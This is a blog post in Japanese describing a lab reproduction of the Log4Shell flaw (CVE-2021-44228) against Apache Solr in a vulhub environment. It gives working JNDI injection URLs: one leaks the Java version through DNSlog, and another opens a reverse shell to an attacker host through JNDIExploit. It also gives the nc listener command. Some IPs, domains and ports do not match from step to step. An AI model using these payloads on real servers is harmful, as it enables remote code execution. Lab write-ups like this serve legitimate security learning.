banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github

Log4Jの逆シリアル化

環境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali システム:攻撃マシンとしてポート情報をリッスンするために nc が必要です
ローカルマシン:中継マシン
CentOS:ターゲットマシン

アドレス情報:
ターゲットマシン IP:192.168.1.4:8983
ローカルマシン IP:192.168.1.2
攻撃マシン:192.168.91.131

ターゲットマシン環境を開始します
image.png
DNS ドメインをリクエストします
http://dnslog.cn/
image.png
ドメイン:
gswq4u.dnslog.cn
Hackbar を開き、まず loadURL をクリックします
image.png

提供されたアドレスをコピーします
image.png
後ろのドメインを、先ほど申請したものに変更します
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
実行をクリックすると、以下のページが表示されます
image.png

ここでフィードバックを受け取ります
image.png
今、JNDIExploit-1.2 を開きます
コマンドを入力します
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i ローカルマシン IP
image.png
その後、攻撃マシンでポートをリッスンします
コマンド:
nc -lvp 4444

Hackbar で以下のコマンドを構築します
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
Execute をクリックします
image.png
リッスンポートからシェルが返されることがわかります
image.png
これで再現が完了しました

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。